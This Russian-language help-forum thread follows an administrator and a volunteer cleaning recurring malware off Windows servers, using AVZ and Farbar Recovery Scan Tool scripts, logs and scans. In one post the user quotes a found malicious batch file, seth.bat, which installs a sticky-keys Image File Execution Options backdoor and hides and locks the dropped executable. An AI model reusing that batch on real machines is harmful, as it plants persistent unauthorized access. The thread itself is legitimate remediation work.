В процессах появляются wahiver.exe

[serga612 0]

Добрый день.

На серверах появляются в запущенные процессы

wahiver.exe

Webisida.Browser

SecureSurf.Browser

Кроме этого 2 процесса запускаются как службы.

KVRT это всё удаляет (а ещё быстрее я руками удаляю всю папку C:\Windows\Inf\NETLIBRARIESTIP), но оно возвращается каждый раз - т.е. источник всей этой заразы у меня найти не вышло.

 

[thyrex 1 468]

Порядок оформления запроса о помощи

Логи прикрепите к следующему сообщению в данной теме.

[serga612 0]

Cпасибо, сейчас сделаю.

Я читал правила и прикреплял лог, видимо что-то пошло не так, а я этого не заметил.

Кстати говоря, прочитав правила, я сначала запустил KVRT, а после того, как тот отработал - логгер.

Может имеет смысл сначала запустить логгер, до того, как вирусы будут удалены с сервера?

CollectionLog-2019.03.25-13.55.zip

[thyrex 1 468]

Выполните скрипт в AVZ из папки Autologger

begin
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 DeleteService('werlsfks');
 DeleteService('spoolsrvrs');
 QuarantineFile('C:\Windows\Inf\NETLIBRARIESTIP\000D\1049\5.0\SQL\lsm.exe','');
 QuarantineFile('C:\Windows\Inf\NETLIBRARIESTIP\000D\1049\5.0\1049\5.0\mms.exe','');
 DeleteFile('C:\Windows\Inf\NETLIBRARIESTIP\000D\1049\5.0\1049\5.0\mms.exe','64');
 DeleteFile('C:\Windows\Inf\NETLIBRARIESTIP\000D\1049\5.0\SQL\lsm.exe','64');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
end.

• Обратите внимание: перезагрузку компьютера нужно выполнить вручную после скрипта.

Выполните скрипт в AVZ

begin
CreateQurantineArchive('c:\quarantine.zip');
end.

c:\quarantine.zip загрузите по ссылке https://virusinfo.info/upload_virus.php?tid=37678

Полученный после загрузки ответ сообщите здесь.

 

Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи.

[serga612 0]

Результат загрузки Файл сохранён как 190325_133853_quarantine_5c98d9ed1cfc2.zip Размер файла 8837 MD5 30bc46f472ca5fa8ea41e6f8443c7d13 Файл закачан, спасибо!

Это был ответ по ссылке.

По поводу сборщика логов - странный момент: Первый раз он у меня запустился и отработал нормально.

Теперь всё время выдаёт сообщение: Вы запустили сборщик логов из терминальной сессии  - Пожалуйста, запустите сборщик логов из консоли.

Причём даже при запуске из консоли Hyper-V так происходит.

 

 

 

[thyrex 1 468]

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

• Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

2. Убедитесь, что в окне Optional Scan отмечены List BCD, Driver MD5 и 90 Days Files.

3. Нажмите кнопку Scan.

4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.

5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).

6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.

[serga612 0]

Сделано.

Desktop.zip

[thyrex 1 468]

Задания Планировщика

MonitorProcesses (связана с запуском C:\Temp\MonitProcess.ps1)

MoveItemsConverstionHistory (связана с запуском C:\Temp\moveconversation.ps1)

Вам известны?

 

 

1. Выделите следующий код:

Start::
CreateRestorePoint:
File: C:\Users\adm.a.serga\AppData\Local\Temp\seth.exe
File: C:\Users\adm.a.serga\AppData\Local\Temp\seth.bat
File: C:\Windows\Fonts\web\winlogon.exe
File: C:\Users\adm.a.serga\svchost.exe
S2 spoolsrvrs; C:\Windows\Inf\NETLIBRARIESTIP\000D\1049\5.0\1049\5.0\mms.exe [X]
S2 werlsfks; C:\Windows\Inf\NETLIBRARIESTIP\000D\1049\5.0\SQL\lsm.exe [X]
S3 cpuz139; \??\C:\Users\ADMAPR~1.ITK\AppData\Local\Temp\cpuz139\cpuz139_x64.sys [X] <==== ATTENTION
C:\Windows\Fonts\web\Webisida.Browser.exe
C:\Windows\Fonts\web\taskhost.exe
C:\Windows\Fonts\web\winlogon.exe
C:\Windows\Fonts\web\gecko\securesurf.browser.client.exe
C:\Windows\Inf\NETLIBRARIESTIP
End::

2. Скопируйте выделенный текст (правая кнопка мыши – Копировать).

3. Запустите Farbar Recovery Scan Tool.

4. Нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

• Обратите внимание: перезагрузку компьютера нужно выполнить вручную после скрипта.

[serga612 0]

Задание планировщика C:\Temp\MonitProcess.ps1 мне известно

C:\Temp\moveconversation.ps1 неи ( и сегодня нет уже людей на работе, которые могли бы прояснить), но я просмотрел текст скрипта и думаю, что знаю, кто его написал и вроде как это не должно запускать вирусы.

Инструкцию выполнил.

FARbar берёт данные из буфера обмена, или в ней пропущен пункт "вставить"?

Лог прилагаю.

Fixlog.txt

[thyrex 1 468]

FARbar берёт данные из буфера обмена

в предложенной мной инструкции именно так.

 

Содержимое C:\Users\adm.a.serga\AppData\Local\Temp\seth.bat процитируйте.

 

C:\Users\adm.a.serga\AppData\Local\Temp\seth.exe повтроно проверьте на virustotal.com, даже если будет показывать, что файл проверялся в начале февраля

 

Сделайте лог МВАМ

[serga612 0]

Содержимое файла seth.bat:

 

echo

copy seth.exe "%windir%\system32" 

set d="%windir%\system32\seth.exe"

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "seth.exe" /f

echo.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe [19]>"%tmp%"\reg.txt && regini "%tmp%"\reg.txt && del "%tmp%"\reg.txt

 

@attrib +s +h %d%

@echo Y| cacls %d% /t /g SYSTEM:r

@echo S| cacls %d% /t /g SYSTEM:r

@echo J| cacls %d% /t /g SYSTEM:r

@echo O| cacls %d% /t /g SYSTEM:r

@echo E| cacls %d% /t /g SYSTEM:r

 

По вирусинфо:

 

Результат загрузки Файл сохранён как 190326_080804_seth_5c99dde4917e5.zip Размер файла 23254 MD5 fcec401dee584b941eecaef8ecffa33e Файл закачан, спасибо!

 

И лог во вложении.

 

 

mbam05.txt

[thyrex 1 468]

Что с проблемой?

[serga612 0]

Что с проблемой?

В данный момент на этом сервере она не воспроизводится.

Т.к. серверов несколько (и время от времени оно возникает на них снова) то вариант лечения такой:

KVRT + MBAM + контролировать ключи реестра из файла seth.bat?

[thyrex 1 468]

seth.bat:удалите.

 

 

C:\Users\adm.a.serga\AppData\Local\Temp\seth.exe повтроно проверьте на virustotal.com, даже если будет показывать, что файл проверялся в начале февраля

результат в виде ссылки не увидел, а вместо этого Вы зачем-то загрузили файл на Вирусинфо.

[serga612 0]

 

seth.bat:удалите.

 

 

C:\Users\adm.a.serga\AppData\Local\Temp\seth.exe повтроно проверьте на virustotal.com, даже если будет показывать, что файл проверялся в начале февраля

результат в виде ссылки не увидел, а вместо этого Вы зачем-то загрузили файл на Вирусинфо.

 

Промахнулся.

 

https://www.virustotal.com/gui/file/190ce0a2fc65ec52860899c5597ddbff81d41d0fd673874b9ea0d5fa986e7378/detection